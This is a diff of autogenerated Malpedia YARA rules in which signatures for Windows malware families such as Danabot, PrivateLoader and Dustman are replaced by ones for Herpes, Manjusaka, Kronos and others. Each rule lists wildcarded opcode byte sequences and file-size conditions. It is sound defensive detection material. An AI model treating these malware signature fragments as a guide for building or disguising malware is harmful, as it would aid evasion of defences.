-		$sequence_5 = { e8???????? 4533c9 4c8d8424e0040000 488d942490090000 33c9 e8???????? 33c0 }
-		$sequence_6 = { 8b4c2454 e8???????? 8b442460 89442464 8b542464 488d8c24e0020000 }
-		$sequence_7 = { 8b0d???????? 488bd8 33d2 e8???????? 4885db 7414 488d052a090200 }
-		$sequence_8 = { b901000000 486bc902 488b542418 88040a b801000000 486bc003 }
-		$sequence_9 = { e8???????? 488b8c2430010000 e8???????? 89442448 4883bc243001000000 740d }
+		$sequence_0 = { c745f800000000 c745fc00000000 6a00 8b4510 50 8d4dfc }
+		$sequence_1 = { 6a00 6a12 6a01 e8???????? 83c410 85c0 7528 }
+		$sequence_2 = { 51 6a00 6a01 8b5514 52 }
+		$sequence_3 = { 8b4ddc 51 8b5510 52 8b450c 50 e8???????? }
+		$sequence_4 = { e8???????? 83c408 eb20 8b45f4 50 e8???????? }
+		$sequence_5 = { 8b45fc 8b4df8 3b4818 7365 8b55f8 }
+		$sequence_6 = { 50 8d8decfeffff 51 68???????? 8d95e8fdffff 52 ff15???????? }
+		$sequence_7 = { 894a04 eb09 c745f400000000 eb02 eba0 }
+		$sequence_8 = { 8bec 83ec18 c745fc00000000 c745f800000000 8d45fc 50 6a28 }
+		$sequence_9 = { ff15???????? 8b55f8 0355f4 8955f8 b801000000 6bc800 }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 75776
 }
-rule MALPEDIA_Win_Skipper_Auto : FILE
+rule MALPEDIA_Win_Herpes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "64a2fa4c-6691-570a-b99c-c64694f81fbb"
+		id = "fedf32f5-9ae5-5123-9361-9a81a141f76e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skipper_auto.yar#L1-L436"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.herpes_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "a0d077545acb481645aa7b1b148ae369d0e9c4615de07cc8af0856e7c8c6f15a"
+		logic_hash = "769ea4914adc8e6bb491030ee0781ca8f47cafb6846f9263dbbc09dc62dc70a2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -137840,68 +138377,32 @@ rule MALPEDIA_Win_Skipper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 6a03 68???????? 68???????? 6a50 }
-		$sequence_1 = { e8???????? 6804010000 e8???????? 6804010000 8bf8 6a00 }
-		$sequence_2 = { ff15???????? 6a00 6a00 6a00 6a00 50 ff15???????? }
-		$sequence_3 = { 6800803801 6a00 ff37 e8???????? 6804010000 c7470400000000 }
-		$sequence_4 = { 0fb6c1 8b4d08 0fb68405fcfeffff 320439 }
-		$sequence_5 = { 6804010000 6a00 50 8945e0 e8???????? }
-		$sequence_6 = { 0fb68405fcfeffff 320439 47 8847ff 4e 0f8568ffffff 8b4dfc }
-		$sequence_7 = { 0385f8feffff 898df4feffff 25ff000080 7907 48 0d00ffffff }
-		$sequence_8 = { e8???????? 83c404 6a00 6a64 52 }
-		$sequence_9 = { 6800308000 6a00 6a00 68???????? }
-		$sequence_10 = { 038de8feffff 8b85e0feffff 99 f77d0c 8b4508 }
-		$sequence_11 = { 8b85e0feffff 83c001 8985e0feffff 81bde0feffff00010000 0f8d84000000 8b8de0feffff 0fb68c0df0feffff }
-		$sequence_12 = { 44880a 410fb610 4103d1 81e2ff000080 7d0a }
-		$sequence_13 = { 8a85effeffff 888415f0feffff 0fb64df8 0fb6940df0feffff }
-		$sequence_14 = { 81c900ffffff 41 898de8feffff 8b85e0feffff 8a8c05f0feffff 888deffeffff 0fb695e8feffff }
-		$sequence_15 = { 8d1492 03d2 2bc2 4863d0 420fb60432 4403c0 }
-		$sequence_16 = { 4863d0 420fb60432 4403c0 4403c6 4181e0ff000080 7d0d 41ffc8 }
-		$sequence_17 = { ebd0 c785e8feffff00000000 c785e0feffff00000000 eb0f 8b85e0feffff 83c001 }
-		$sequence_18 = { 450fb608 4803d0 0fb602 418800 }
-		$sequence_19 = { 7d0d 41ffc8 4181c800ffffff 41ffc0 410fb6c0 488d1424 }
-		$sequence_20 = { e9???????? c785dcfeffff00000000 eb0f 8b8ddcfeffff 83c101 }
-		$sequence_21 = { 48 0d00ffffff 40 8945f8 8b4df8 0fb6940df0feffff }
-		$sequence_22 = { ffc0 488d5201 3d00010000 7cf1 448bc1 448bc9 }
-		$sequence_23 = { 8b4508 0fb61410 03ca 81e1ff000080 }
-		$sequence_24 = { 0fb602 8843ff 408832 4181f900010000 7c9a 488bdd 85ed }
-		$sequence_25 = { 488d1424 4c03c0 410fb6c2 450fb608 4803d0 }
-		$sequence_26 = { 448bf0 0f85f3000000 488d0d20590000 33d2 41b800080000 ff15???????? 488bd8 }
-		$sequence_27 = { 668986be010000 c74668885a4100 6a0d e8???????? 59 }
-		$sequence_28 = { 743c 8b75e0 8bc6 c1f805 83e61f c1e606 03348520b72300 }
-		$sequence_29 = { 488b442450 488d0d75a80000 488b0cc1 4c8d4c244c 488d9520060000 498b0c0c 895c2448 }
-		$sequence_30 = { c3 48895c2408 57 4883ec20 488d1de7a40000 488d3de0a40000 eb0e }
-		$sequence_31 = { 8810 33ff 8d5001 8b048d606d4100 }
-		$sequence_32 = { 59 8b7508 8d34f570a02300 391e 7404 8bc7 eb6e }
-		$sequence_33 = { 56 56 56 e8???????? 83c414 8b45fc ff34c51ca92300 }
-		$sequence_34 = { 7509 488d0deee90000 eb02 33c9 e8???????? 4883c438 c3 }
-		$sequence_35 = { 8d0c8d20b72300 8901 8305????????20 8d9000080000 }
-		$sequence_36 = { 7456 8b4de0 8d0c8d20b72300 8901 }
-		$sequence_37 = { 8965ec 6aff 6a00 8d4520 c741140f000000 c7411000000000 50 }
-		$sequence_38 = { 8a8c181d010000 8888b0a52300 40 ebe6 }
-		$sequence_39 = { 3b1cfd18a92300 7409 47 897dfc 83ff17 72ee }
-		$sequence_40 = { 4c8d157da80000 33d2 4d8bc2 448d4a08 }
-		$sequence_41 = { c785d4feffffffff1f00 8b4508 50 6a00 8b8dd4feffff 51 }
-		$sequence_42 = { 8078035c 7505 8b75f0 03f0 83c005 83c205 }
-		$sequence_43 = { 41b894000000 488908 8b0d???????? 894808 0fb60d???????? }
-		$sequence_44 = { ff15???????? 448be8 85c0 0f8449010000 488b4c2450 488364242000 488d052fab0000 }
-		$sequence_45 = { 8b5c2444 e9???????? 488d05dfa90000 4a8b0ce8 41f6440c0880 0f84cb020000 33db }
+		$sequence_0 = { ffd7 68???????? ffb6f0010000 89863c010000 ffd7 68???????? ffb6f0010000 }
+		$sequence_1 = { 6a02 6a00 6a00 6800000040 8d95f4fdffff 52 ff15???????? }
+		$sequence_2 = { 894dd0 c745c804000000 ffd6 85c0 755c 8b1d???????? ffd3 }
+		$sequence_3 = { 8d8d24faffff 51 57 ff15???????? 85c0 0f84e2000000 8b1d???????? }
+		$sequence_4 = { 33c9 3b04cd10c84100 7413 41 83f92d 72f1 8d48ed }
+		$sequence_5 = { 50 6a01 8d45cc 50 56 ff15???????? 894590 }
+		$sequence_6 = { 8dbd88fcffff e8???????? 84c0 745a 8b0d???????? 8d85c0fcffff 50 }
+		$sequence_7 = { 8b0d???????? 8d85c0fcffff 50 51 e8???????? c645fc0b 8b15???????? }
+		$sequence_8 = { e8???????? eb15 3bc3 7511 8b45b8 895dc8 }
+		$sequence_9 = { 83c404 ff15???????? 85c0 7418 6804010000 8d8c24e00a0000 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Sword_Auto : FILE
+rule MALPEDIA_Win_Soundbite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4f1eb68-153e-5ccd-81d3-89b6b9da3f3a"
+		id = "70cdb19a-d0a2-5f5f-a69b-31680210f3d2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sword_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.soundbite_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "065f81feabb14c35e08637eea61a6954f973d06eb84d7a6351d2f07f555efbd2"
+		logic_hash = "d07ea48c839908887a0a5f9ab78be91fc08852ce51b809ff0c620d5b56719109"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137915,32 +138416,32 @@ rule MALPEDIA_Win_Sword_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4c2430 6a01 51 e8???????? 83c410 }
-		$sequence_1 = { 8dbc24d40b0000 f3ab ebb7 8b542414 }
-		$sequence_2 = { 8b442410 50 ffd6 8d8c2484020000 }
-		$sequence_3 = { 81c408020000 c3 83c9ff 33c0 f2ae f7d1 2bf9 }
-		$sequence_4 = { 49 885c29ff 807d0022 7520 8d7d01 83c9ff }
-		$sequence_5 = { 81c4c40f0000 c3 8bb424d80f0000 8b442410 }
-		$sequence_6 = { b940000000 33c0 8d7c2419 8894241c010000 f3ab }
-		$sequence_7 = { 8d4c2420 6a3a 51 e8???????? 83c410 85c0 }
-		$sequence_8 = { f2ae f7d1 49 bf???????? 894c2414 83c9ff }
-		$sequence_9 = { f7d1 49 83f903 77c8 bf???????? }
+		$sequence_0 = { bb???????? e8???????? e8???????? 68???????? ff15???????? 33c0 50 }
+		$sequence_1 = { 8d45f4 64a300000000 c745fc00000000 8b4518 }
+		$sequence_2 = { 8b5714 895614 8b5718 895618 8b571c 89561c 8b5720 }
+		$sequence_3 = { 8b4510 3bf3 7457 57 }
+		$sequence_4 = { 6683bc8e7e0a000000 7533 0fb690614f4200 6683bc967e0a000000 7530 83e804 83f803 }
+		$sequence_5 = { c645fc0a 8bbdf8fcffff 3bcb 0f83c9000000 8bd6 3bfa }
+		$sequence_6 = { 3bc1 0f87200a0000 ff2485f1ad4100 33c0 838de8fdffffff 89858cfdffff 8985a4fdffff }
+		$sequence_7 = { 899d04ffffff c685f4feffff00 8d5001 8d642400 }
+		$sequence_8 = { 8d1491 8b0c02 03c8 8b75e0 8b55f4 890c16 85c9 }
+		$sequence_9 = { e9???????? b830750000 85db 7e09 57 e8???????? 83c404 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Gibberish_Auto : FILE
+rule MALPEDIA_Win_Manjusaka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "865bad8c-5684-533c-98cd-44918d4d88e8"
+		id = "e3ef2c8a-601e-5fad-bcaf-45a15d46a182"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gibberish_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.manjusaka_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c8df032f5625050a647f354eb2ac9a0b117355c598425d253e17209609dc1370"
+		logic_hash = "b609fc5a0f646080989595e70a17261ca84aa420275082a0a377fc146648363a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137954,32 +138455,32 @@ rule MALPEDIA_Win_Gibberish_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8d60ffffff e8???????? c703???????? 8bc3 897b28 89732c e8???????? }
-		$sequence_1 = { 33d2 f77510 895590 8945a0 83fa0a 7d09 c745a430000000 }
-		$sequence_2 = { 660f58348510ed4500 660f5625???????? f20f58f0 660f54cc f20f10d3 660f73d31f }
-		$sequence_3 = { 8b0ccdf2a94700 0fb680c8a94500 330cc5f1a94700 8bc2 c1e818 0fb680c8a94500 330cc5f4a94700 }
-		$sequence_4 = { 663906 0f8542fdffff e9???????? 55 8bec 51 }
-		$sequence_5 = { 0f1f4000 8a07 47 84c0 75f9 8b7314 2bfa }
-		$sequence_6 = { 89842488000000 8bc1 c1c00a 33d0 }
-		$sequence_7 = { 56 57 f6c303 0f850f010000 a803 0f8507010000 8bfa }
-		$sequence_8 = { 334c2420 23c1 33442424 03c2 8944241c 85ed 743c }
-		$sequence_9 = { 25ff000000 83c001 25fe010000 f20f593c85e0dc4500 660f122c85e0dc4500 03c0 }
+		$sequence_0 = { 8b460c f7d0 2346f0 0b4608 8946f0 e9???????? 48897ef0 }
+		$sequence_1 = { 894c2420 458bc6 498bcf 8945ef ba4d000000 e8???????? 8b7d7f }
+		$sequence_2 = { b909000000 f348a5 498b8548020000 48898348020000 410f108518020000 410f108d28020000 410f109538020000 }
+		$sequence_3 = { 7f19 488b4608 6646391c60 7c0e 66412bd7 66015316 0fb77b16 }
+		$sequence_4 = { 4c8b7910 488bcb 4c8b6a18 48895c2478 e8???????? ff4f44 448bc0 }
+		$sequence_5 = { 834e0420 41834e2840 397b30 7509 488b03 40387861 7405 }
+		$sequence_6 = { eb07 488d3dd6030b00 488d1564270b00 488bcf e8???????? 85c0 488d155f270b00 }
+		$sequence_7 = { e8???????? 0f1005???????? 0f1100 0f1005???????? 0f114010 0fb70d???????? 66894820 }
+		$sequence_8 = { e9???????? 660f74d1 660fd7fa 85ff 7510 4c01c3 4883c310 }
+		$sequence_9 = { e9???????? 6641baaecc e9???????? 6641bafefe e9???????? 6641bafffe e9???????? }
 
 	condition:
-		7 of them and filesize < 1068032
+		7 of them and filesize < 4772864
 }
-rule MALPEDIA_Win_Danabot_Auto : FILE
+rule MALPEDIA_Win_Zumanek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "88731f6d-edda-5181-ab28-b879b1e82348"
+		id = "87aee693-fd24-5045-ad68-bbf967fca577"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.danabot_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zumanek_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "0aacaade997adfab10265dc65b353035ffe85eb407c689ce61c2eca9a9f37b60"
+		logic_hash = "692948458546aa7f1172f720f7a047815fbd39df276c694923c84a71f1135e40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137993,32 +138494,32 @@ rule MALPEDIA_Win_Danabot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0f 8b16 e8???????? 8b07 50 8b442424 }
-		$sequence_1 = { 0305???????? 8b15???????? 0315???????? 3bc2 7e0a }
-		$sequence_2 = { e8???????? c645f690 c645f790 648f0500000000 }
-		$sequence_3 = { c1e020 03c3 8906 8b06 e8???????? 8b55f8 }
-		$sequence_4 = { 8b16 e8???????? 8b07 50 8b442428 50 6a0a }
-		$sequence_5 = { 55 68???????? 64ff30 648920 6a02 6800040000 8b75f8 }
-		$sequence_6 = { 50 8b44241c 50 6a0b }
-		$sequence_7 = { e8???????? 8d45f8 e8???????? bb???????? 33c0 55 }
-		$sequence_8 = { 68???????? 64ff30 648920 a1???????? a3???????? a1???????? 0305???????? }
-		$sequence_9 = { 8b0424 8b00 8903 8b0424 8b4004 }
+		$sequence_0 = { fc 81fe382e9330 97 e412 3dd16312c9 103f 0800 }
+		$sequence_1 = { 8802 98 811212242434 48 3c91 4a }
+		$sequence_2 = { 894612 4d 2454 48 5b 91 }
+		$sequence_3 = { 71ef 1a6f35 e30b 5d fc 77f2 f1 }
+		$sequence_4 = { 1dba45e22f 91 7c8b e459 0920 122424 }
+		$sequence_5 = { 386b95 4c 53 196a17 }
+		$sequence_6 = { 4a e8???????? 86b71986f742 06 58 4c 8812 }
+		$sequence_7 = { c101f6 53 32b879629b65 76a2 43 fc }
+		$sequence_8 = { d9c3 ab 5f c50f 9d 54 f233591b }
+		$sequence_9 = { 5a c59cd53a93a658 98 9f f5 6b80e7fa856bb2 55 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 58867712
 }
-rule MALPEDIA_Win_Ksl0T_Auto : FILE
+rule MALPEDIA_Win_Faketc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3ab9e8a-b9b1-5fdf-a960-56956519148f"
+		id = "c5dc084d-e278-57fb-9514-ebf606045902"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ksl0t_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.faketc_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e91b3156f2e9e5f9c8a906372d50f3aa236f543969f133a16425c0f118830109"
+		logic_hash = "d4858f4d36b9ea8cb8d8cc99b63821ae69695a27a1935e91bfea486ad5660c7d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138032,38 +138533,32 @@ rule MALPEDIA_Win_Ksl0T_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? b9ff000000 e8???????? 488bfb 4803ff 4c8d2df17a0000 }
-		$sequence_1 = { 85c0 741d 8b54240c 52 8d442404 50 ff15???????? }
-		$sequence_2 = { ff15???????? 8d9500090000 52 ff15???????? 03c0 50 }
-		$sequence_3 = { 57 8b55dc 52 ff15???????? 57 }
-		$sequence_4 = { 8d8d60060000 51 ff15???????? e9???????? }
-		$sequence_5 = { c68424f900000002 c68424fa00000055 c644245813 c64424593c c644245a3b c644245b31 c644245c13 }
-		$sequence_6 = { 448b8424a4140000 488d1586d20000 488d8c24a0100000 ff15???????? eb4e 66ba5c00 }
-		$sequence_7 = { 8d45f0 64a300000000 8965e8 c745fc00000000 6a01 }
-		$sequence_8 = { 8bac2438030000 b23a 56 b321 8bf1 }
-		$sequence_9 = { c68424090300003a c684240a03000006 c684240b0300002c c684240c03000026 c684240d03000021 }
-		$sequence_10 = { 488d8c24b0030000 e8???????? ba0f000000 488d8c2480010000 e8???????? }
-		$sequence_11 = { 488d0d47e30000 ff15???????? e9???????? 488d1575c00000 4881c25c010000 41b804000000 }
-		$sequence_12 = { 72f3 33c0 90 308c048c000000 40 83f80c }
-		$sequence_13 = { c684242602000036 c684242702000014 c684242802000031 c684242902000031 }
-		$sequence_14 = { 0f8557ffffff b928000000 bf???????? bb???????? bd???????? b8???????? 2bf9 }
-		$sequence_15 = { c684249201000030 c68424930100003b c684249401000018 c684249501000020 c684249601000021 }
+		$sequence_0 = { e8???????? 83c404 837c245c08 885c2418 895c2428 897c242c 720d }
+		$sequence_1 = { ff15???????? a1???????? 50 68af130000 53 ffd7 50 }
+		$sequence_2 = { 8b450c 894218 8b4dfc c7412001000000 eb04 33c0 eb1e }
+		$sequence_3 = { e8???????? 83c40c 397d08 7454 8b85ccfbffff be10000000 39b5e0fbffff }
+		$sequence_4 = { ff5510 83c408 3bf4 e8???????? 85c0 7423 8b4d08 }
+		$sequence_5 = { c7430401000000 c70301000000 8d9b00000000 8b13 8bc2 33c9 6bc02c }
+		$sequence_6 = { 8b049518e85f00 33049d18e85f00 c1ef10 81e7ff000000 3304bd18e45f00 899c2498000000 3304ad18dc5f00 }
+		$sequence_7 = { e8???????? a3???????? 68fa030000 57 ffd3 6a00 6a00 }
+		$sequence_8 = { d1e9 33ed 0be8 8b442470 c1e31f 0bd9 8b4c2474 }
+		$sequence_9 = { e8???????? 83c408 83bdd8fdffff00 7516 8b85d4fdffff 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 6864896
 }
-rule MALPEDIA_Win_Molerat_Loader_Auto : FILE
+rule MALPEDIA_Win_Montysthree_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bbb2773d-16c5-5ea1-96c6-2ff80ea4ab38"
+		id = "0d03b577-0149-576c-bee9-a21123040e4f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.molerat_loader_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.montysthree_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "f7f702f0dc9bfb0fb7a2fb852c5b313a67822e64049d201a13fd2318ed509e52"
+		logic_hash = "bf3d99d0efe6d2be58b918ad67e35573b0208282c240cbcabb922d766da8ba39"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138077,32 +138572,32 @@ rule MALPEDIA_Win_Molerat_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89480c 894808 c3 6a14 e8???????? 59 85c0 }
-		$sequence_1 = { 668b4d08 663b8800b64300 740c 40 40 }
-		$sequence_2 = { 83c40c 32c0 e9???????? 8d55d4 52 68???????? 50 }
-		$sequence_3 = { 59 59 80cb01 8bc6 c1f805 8d0c8520924400 8bc6 }
-		$sequence_4 = { 50 8b4204 ffd0 c745fcffffffff 8b85e4070000 83c0f0 8d480c }
-		$sequence_5 = { 8d55ec 68???????? 52 c645fc0d e8???????? }
-		$sequence_6 = { c645fc07 e8???????? 83c40c 885dfc e8???????? }
-		$sequence_7 = { 68000000a0 8d55ec 52 8bce e8???????? 6a00 6a00 }
-		$sequence_8 = { e8???????? ff45c0 8b5dd8 47 e9???????? }
-		$sequence_9 = { e8???????? 83c40c 83bd74ffffff00 7f05 e8???????? 8b9d70ffffff e8???????? }
+		$sequence_0 = { e8???????? 8d4d94 e8???????? 8d4df8 e8???????? }
+		$sequence_1 = { 85c0 7426 ff7608 ff450c 43 ffd7 }
+		$sequence_2 = { 7407 50 e8???????? 59 8b7c240c 8b4708 }
+		$sequence_3 = { ff15???????? 8945d8 3bc6 0f8482000000 8d8300080000 8945d4 56 }
+		$sequence_4 = { e8???????? 50 e8???????? 8bf8 3bfe 59 59 }
+		$sequence_5 = { 50 8d45bc 50 8d45ec 50 8d4dcc }
+		$sequence_6 = { 56 57 68???????? e8???????? 59 8d4da8 e8???????? }
+		$sequence_7 = { ff750c ff75fc e8???????? 035dec 017dfc }
+		$sequence_8 = { 8b35???????? ffd6 3db7000000 7441 ffd6 8bf0 }
+		$sequence_9 = { 53 57 53 6aff 53 8d4de8 }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Dustman_Auto : FILE
+rule MALPEDIA_Win_Touchmove_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f9958a70-82e7-51bb-b66a-8dad70813bed"
+		id = "a88e9c25-4116-5e49-8a2c-fef3336f0802"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dustman_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.touchmove_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "56d31c5fdf78a9c7870d8fbabe0b3ca7863397ea82e2f5ab171dff121b78c1f1"
+		logic_hash = "519a7e3bd048a6a0769391087a62b1ec389f7202cc576a740e9eb0fb3d43844d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138116,32 +138611,32 @@ rule MALPEDIA_Win_Dustman_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88480a 488b4c2458 0fb60c08 88480b }
-		$sequence_1 = { eb1e 488bc3 498784f6a0c70100 4885c0 }
-		$sequence_2 = { 488b8dd8000000 0fb60c01 88483b 488b8de0000000 0fb60c01 }
-		$sequence_3 = { 4c0bd0 0fb68523020000 48c1e018 4c0bd0 0fb68524020000 48c1e020 4c0bd0 }
-		$sequence_4 = { 48898d88000000 488bca 492bca 4c8d9dd2010000 4903cb 48898d90000000 }
-		$sequence_5 = { 8bf2 4c8d0da5830000 488be9 4c8d0593830000 }
-		$sequence_6 = { 488bca 492bca 488db5a2010000 4803f1 }
-		$sequence_7 = { 488bd8 4883eb02 7826 488bfb }
-		$sequence_8 = { 884831 488b8d90000000 0fb60c01 884832 488b8d98000000 0fb60c01 884833 }
-		$sequence_9 = { 48894d78 488bca 492bca 4c8d9dd0010000 4903cb }
+		$sequence_0 = { 41b800040000 488d8c2452010000 e8???????? 4c8d442448 488d152df90000 }
+		$sequence_1 = { 488d157af70000 488d8d90000000 e8???????? 4c8d8590000000 33d2 33c9 }
+		$sequence_2 = { 7528 48833d????????00 741e 488d0d499f0000 e8???????? 85c0 }
+		$sequence_3 = { 41b8ee000000 488d8d92430000 e8???????? c6858044000000 33d2 41b8ff000000 488d8d81440000 }
+		$sequence_4 = { ff15???????? 488d442450 4889442420 458bce 4533c0 488d9580410000 48c7c102000080 }
+		$sequence_5 = { 0f8514010000 4c8d2d36cd0000 41b804010000 668935???????? 498bd5 ff15???????? 418d7c24e7 }
+		$sequence_6 = { 48833d????????00 0f844d040000 48833d????????00 0f843f040000 }
+		$sequence_7 = { 833d????????00 7505 e8???????? 488d3d40e00000 41b804010000 }
+		$sequence_8 = { 488bfb 488bf3 48c1fe05 4c8d25bebd0000 83e71f 486bff58 }
+		$sequence_9 = { 8bc8 e8???????? ebc9 488bcb 488bc3 488d1597e40000 48c1f805 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 224256
 }
-rule MALPEDIA_Win_Privateloader_Auto : FILE
+rule MALPEDIA_Win_Kronos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d996c731-cbb3-50a4-93a5-b71789f95831"
+		id = "a0b4b62f-a866-556e-9f95-bc6e89d12770"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.privateloader_auto.yar#L1-L184"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kronos_auto.yar#L1-L101"
 		license_url = "N/A"
-		logic_hash = "b3bd260ff9676412911b82f7ca10842c721430b21d232272a50e615d0d279a78"
+		logic_hash = "47204f1b85469eed91b1a8f9ff5dd1693684b7472dfd0cf1125143da1fd8fdea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138155,41 +138650,30 @@ rule MALPEDIA_Win_Privateloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945e4 8b4d08 51 0fbe550c }
-		$sequence_1 = { 66894c5002 eb19 33d2 8855ff 0fb74508 50 0fb64dff }
-		$sequence_2 = { 8b4dfc c7417c50000000 eb3c 837d080b }
-		$sequence_3 = { 894de0 8b45e0 8945e8 8b4de8 8b5110 8955ec 8b4de0 }
-		$sequence_4 = { 894de0 8b5508 8955fc 8b45fc }
-		$sequence_5 = { 8b45d8 8b4ddc 8b55d0 8b75d4 }
-		$sequence_6 = { 894de0 8b55e0 8955dc 8b45f0 }
-		$sequence_7 = { 8b4210 2b4508 8945f4 8b4df4 }
-		$sequence_8 = { e8???????? 33d2 b93f000000 f7f1 }
-		$sequence_9 = { 896c2404 8bec 81ec68010000 a1???????? 33c5 8945fc 56 }
